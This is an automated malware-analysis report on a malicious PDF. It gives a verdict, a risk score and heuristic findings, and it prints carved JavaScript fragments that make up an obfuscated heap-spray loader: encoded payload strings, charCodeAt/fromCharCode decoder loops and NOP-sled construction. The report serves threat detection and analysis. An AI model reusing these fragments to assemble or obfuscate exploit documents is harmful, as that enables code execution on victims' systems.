Verdict: MALICIOUS
Risk Score: 116

Malware Insights

MITRE ATT&CK: T1059.001 PowerShell
The PDF file was flagged as malicious by an ML classifier with high confidence. Static analysis revealed embedded JavaScript streams and the use of String.fromCharCode, indicating obfuscation techniques. The presence of JavaScript actions within the PDF structure suggests an attempt to execute arbitrary code. No specific family could be identified, but the techniques used are common for PDF-based malware delivery.
Machine Learning
- Nyx PDF Classifier: malicious score 1.0000
Heuristics (4)
- JavaScript action (low, 2 related findings) PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical) PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  Matched line in script: `/S /JavaScript /JS (var nops='';for\(i=0;i<nnn2.length;i+=4\){c=0;for\(j=0;j<4;j++\)c=16*c+nnn2.charCodeAt\(i+j\)-65;nops+=String.fromCharCode\(c\);}) >>`
- Embedded JS stream (low) PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (32)
Files carved from inside the sample during analysis. The Preview column shows the first 1,000 lines of each extracted script (every object here is a single line); the Detection column is filled only where the analyzer reported a result for that artifact.

| Filename | Kind | Source | Size | SHA-256 | Preview | Detection |
|---|---|---|---|---|---|---|
| javascript_obj0010_001.js | pdf-javascript-stream | PDF /JS object 10 at offset 0x369F | 40 bytes | f9ae5a33db8c7c1304813e927490f51369c0114e1b7e481ce8d3cc0f2f95f72e | `var ppp=new Array();var nnn=new Array();` | |
| javascript_obj0012_003.js | pdf-javascript-stream | PDF /JS object 12 at offset 0x375B | 86 bytes | d3db7dd98187ed7f4fc953f90f55dbb90ffe81f408bd91f2f213e7016c644722 | `ppp[1]='CEPECLMJFKLBLFDBECBDADECBDIDMCMELLJMFIANOBJCCDANBALIIANEGJOGNMFHDPLLCNNCFHMH';` | |
| javascript_obj0014_005.js | pdf-javascript-stream | PDF /JS object 14 at offset 0x383B | 44 bytes | 7342f2e2ce3b5f8b70ea52c219c488b46c66ba6ba8f9752b018c001a9bdc88d2 | `ppp[3]='KJCEDGCLFMBGIJAPFDFCJNNOIJIFAOMJHC';` | |
| javascript_obj0015_006.js | pdf-javascript-stream | PDF /JS object 15 at offset 0x38A1 | 84 bytes | 946b17dcf6a4d3f82cda790f4fb07a2af061646e26fb8e5441a1a41a217ab1a2 | `ppp[4]='HAEDMLAKHMKNCMOFINFPGFFNJFLPFKMMIOLMJGPLJHAGHCCMLJDALMJBGPADOFFCIMEHABDOFL';` | |
| javascript_obj0016_007.js | pdf-javascript-stream | PDF /JS object 16 at offset 0x392F | 92 bytes | f3c389e26cd51de99e501bdfb67f595ee7e84fc5872d234e733727179f65e66b | `ppp[5]='EKAJKACKIDNLFGAJGOICNFNLBBBLGJLBOBJIBFBPNPELMDOFBLPOMENGNMGCPGMGNMBIAOJCFBHHJEPOKE';` | |
| javascript_obj0017_008.js | pdf-javascript-stream | PDF /JS object 17 at offset 0x39C5 | 54 bytes | 5ba0c923df9fa631eadc1a2b82288bcd9080ae7434d0ad70c947f8a88598cc21 | `ppp[6]='KAACLFNNPGIHBMHPHHEMLBIBHHCEHFOOCIPFNKOFHLFI';` | |
| javascript_obj0018_009.js | pdf-javascript-stream | PDF /JS object 18 at offset 0x3A35 | 84 bytes | 18b1c02098373ec499d9c620b6fccb378e25ada72c8083129bdf7c43b8844375 | `ppp[7]='HFLDMBBIPFDOHAFDLICMIKHOKAAHGJPJPIJKHLDNGIEAGIENFBPPPDBEFEOOJJJICJJICEAONM';` | |
| javascript_obj0019_010.js | pdf-javascript-stream | PDF /JS object 19 at offset 0x3AC3 | 64 bytes | 995dbc1ce05e3c001d7888bf8df48cdd57346661a84825163166724f9f877e72 | `ppp[8]='PCPNGJKEMGONJECGBFJNOIMHFMCCBCAPHGHKGHEFGEMNCOOKDMLMBL';` | |
| javascript_obj0020_011.js | pdf-javascript-stream | PDF /JS object 20 at offset 0x3B3D | 60 bytes | 57ba47b2c151d8e0615eebfbfed2d14cee8ccc3614febfb5b9eab1f4bb893a6c | `ppp[9]='MACIFKCNBFLHMHPLOALABOJDKINPJNFNBEHCJJKONLFJLPBOFN';` | |
| javascript_obj0021_012.js | pdf-javascript-stream | PDF /JS object 21 at offset 0x3BB3 | 61 bytes | 78021d6f1e23f18f20dc4d852e5466a202bc326e656c50af383468cf33c2a728 | `ppp[10]='OLLEGGJHEAFLKOGMMMPCGKEHPHFBHBMOPBEPACGKIEIEPBIBAO';` | |
| javascript_obj0022_013.js | pdf-javascript-stream | PDF /JS object 22 at offset 0x3C2A | 73 bytes | e7ed5cfa68cc8745b3c00ba61d9a3bb339656b980a099c0b8368a0cd31af772a | `ppp[11]='CHAEOLMPBIMMPOMALPDMOFOIDGIKBNEKMMGICEBJEFIBMKKNCOOLDOPMNGONHF';` | |
| javascript_obj0024_015.js | pdf-javascript-stream | PDF /JS object 24 at offset 0x3CF8 | 45 bytes | f5858eeb26a8e226da712a59d170ee5563cfe6c823bf18cd478f5c69bc21b868 | `ppp[13]='EGPDMFOIDGGOJMKBEIFCHEGAGOPHCAMCEK';` | |
| javascript_obj0025_016.js | pdf-javascript-stream | PDF /JS object 25 at offset 0x3D5F | 57 bytes | 2d1b23b45f293954ea379799b242ac22e4524d1eb5a8b18292b67ee28f793514 | `ppp[14]='FJIJGMNOOGICADNFPMHMJCBLAFLFLJJMGHIKAENFDJPILH';` | |
| javascript_obj0026_017.js | pdf-javascript-stream | PDF /JS object 26 at offset 0x3DD2 | 49 bytes | 5856d3c2558bc11c5cf1553c078f122447fdcdb5ecf79f9a9c5790c6ab22bb87 | `ppp[15]='JDAOHMLEFIGLOGPOJBOGBAFPIHGGDFCLEECHDC';` | |
| javascript_obj0027_018.js | pdf-javascript-stream | PDF /JS object 27 at offset 0x3E3D | 65 bytes | 39a06a9254a943bc2141243373c252c13e781c330f56b7c26cda1951a2375518 | `ppp[16]='EDICAFPGGCCIKALOJPNOPJOKDDPMHAMODCDOCCJOGEKJJIKBPFGBNO';` | |
| javascript_obj0031_022.js | pdf-javascript-stream | PDF /JS object 31 at offset 0x3FA7 | 67 bytes | 1ab7e5d8ceb50cf464f33d5645516e5efc26ebb8a3efa768e6397311e71fdc0e | `ppp[20]='OPBIAFLNHFMKMEMAGIBABMFDKKBPLKNOKBNIBICCMDOGNGFJFEAMIGFK';` | |
| javascript_obj0032_023.js | pdf-javascript-stream | PDF /JS object 32 at offset 0x4024 | 85 bytes | e266473448dd6748ecec1dd1bc6dbbe19259bbceab8e72ef32f38965cd071f8f | `ppp[21]='PBDCPAPBLPEKACBMIEHMFNIPDDGIEJPMPLNPMBKLJIHAONKMOLFIPAGEDOJJJGPMIBOKGJPKMP';` | |
| javascript_obj0033_024.js | pdf-javascript-stream | PDF /JS object 33 at offset 0x40B3 | 97 bytes | 760a36914575b76538c0baeb9758a2c5e92407a6d945bb734561d11df8bfa433 | `ppp[22]='JGMKIDHMAAGGGCNJEAICCAMAAKKKHNHEPMDBILEJLJLLBNAOEHOBGDPBOAHFMPOBGJNBMJIJJAOHLMDGCNNBOD';` | |
| javascript_obj0034_025.js | pdf-javascript-stream | PDF /JS object 34 at offset 0x414E | 77 bytes | bf7aa9a20bedefde679dbdbf11b8eb4bd5dde4b24f23a6cfc410d901f65c37cf | `ppp[23]='LIFPOHJOFAAECFEMEDFNNDANOLKHMGHHCEIBIPCAELLLKFDMPGBLOKCHJEIJDNBMMD';` | |
| javascript_obj0036_027.js | pdf-javascript-stream | PDF /JS object 36 at offset 0x4226 | 51 bytes | e8a0e21d67b77a668cae65199ef0c68249f77161aaaaaf566bb3d6458cf0cdfe | `ppp[25]='FMNJAENBANLLHEGAINNBJBIIIGGNKJFILDHBJEKK';` | |
| javascript_obj0038_029.js | pdf-javascript-stream | PDF /JS object 38 at offset 0x42DC | 57 bytes | 495b119775e9a58f1e4689779bc201f2929505f3ce12d7047cc9e44ecdaededa | `ppp[27]='CENAGBCAANLEPHDINEFKKAPFPNFJCFJNBBBLHCIPDNEMPI';` | |
| javascript_obj0039_030.js | pdf-javascript-stream | PDF /JS object 39 at offset 0x434F | 95 bytes | f2d2cbb5871c013d1d55a1cd338047ffe5aab3f7e0a8727038111bb871aac5d6 | `ppp[28]='FLHAOCDHEOKBKAPFHJHGPDPLMNKKMKAPIPPEFBGCIEFNFPAKEJDFCJHMODDEHBBBPJHNHGHGMIGMCDKNBLOD';` | |
| javascript_obj0041_032.js | pdf-javascript-stream | PDF /JS object 41 at offset 0x4437 | 35 bytes | 16ed55b24490aa1d8a6b62c27472c096320f97307e7875a9615f44ea7e8f4b08 | `ppp[30]='PIFGOHMFEEKNEKEBGEHGHLCD';` | |
| javascript_obj0044_035.js | pdf-javascript-stream | PDF /JS object 44 at offset 0x453A | 77 bytes | d594ca9b5d39251b8917d295c4a55e9a5333847e1956651d11a55476ed07b4e3 | `ppp[33]='HHHGJBGMKLDKHAMCMJHBMKIHHNFFJJBGDFGLPLCOAJNLMKEODHBNIGJMLIDJJEEEGI';` | |
| javascript_obj0045_036.js | pdf-javascript-stream | PDF /JS object 45 at offset 0x45C1 | 33 bytes | f2175d4dc34113ce2969de7b3f349e4eb1ba80af850e18be9097e832a0872cd2 | `ppp[34]='LJMKFFFAJPLDPCKKFIPCPO';` | |
| javascript_obj0046_037.js | pdf-javascript-stream | PDF /JS object 46 at offset 0x461C | 49 bytes | c2e8698a64839df4f8ec75a196ecd78212a05e31eb3a22e3e12cd8e606e10cbc | `ppp[35]='EEJBMNKNGEDIKNCFDDLGHNJINPDDILODMHKLMB';` | |
| javascript_obj0055_046.js | pdf-javascript-stream | PDF /JS object 55 at offset 0x48C7 | 49 bytes | 5919c0d1d84a5a746be9f27963881ad88d4190b52b00795a7bba41f91757774f | `var pay='';for (i=0;i<ppp.length;i++)pay+=ppp[i];` | |
| javascript_obj0056_047.js | pdf-javascript-stream | PDF /JS object 56 at offset 0x4934 | 51 bytes | 9882b77792295f132527561d187f85c94b2cd973564768e464959f18c36b3adf | `var nnn2='';for (i=0;i<nnn.length;i++)nnn2+=nnn[i];` | |
| javascript_obj0057_048.js | pdf-javascript-stream | PDF /JS object 57 at offset 0x49A3 | 121 bytes | d0c51bf80c2b774fd7e3f148d01ffbc945e29725fa0df8312c7ee2e2af01f03e | `var nops='';for(i=0;i<nnn2.length;i+=4){c=0;for(j=0;j<4;j++)c=16*c+nnn2.charCodeAt(i+j)-65;nops+=String.fromCharCode(c);}` | ClamAV: no threats found. Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token). |
| javascript_obj0058_049.js | pdf-javascript-stream | PDF /JS object 58 at offset 0x4A5E | 119 bytes | b1b2b43288ce70ec200b2f13b08007f27b53e440ecc0d66f3597d77149e048d4 | `var coqu='';for(i=0;i<pay.length;i+=4){c=0;for(j=0;j<4;j++)c=16*c+pay.charCodeAt(i+j)-65;coqu+=String.fromCharCode(c);}` | ClamAV: no threats found. Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token). |
| javascript_obj0059_050.js | pdf-javascript-stream | PDF /JS object 59 at offset 0x4B17 | 42 bytes | cdb00d413dd3dc5b9d3e3780f1775e73dbb44b071a24019bd9d4f5472f12fea2 | `var nop='';for(i=0;i<128;i++)nop=nop+nops;` | |
| javascript_obj0060_051.js | pdf-javascript-stream | PDF /JS object 60 at offset 0x4B7D | 40 bytes | 8685060b59c6fc8b97b63aec5887d1ab60834301ec5794892d52bb5db733a84c | `hpb=nop+coqu;big=nops;spr=20+hpb.length;` | |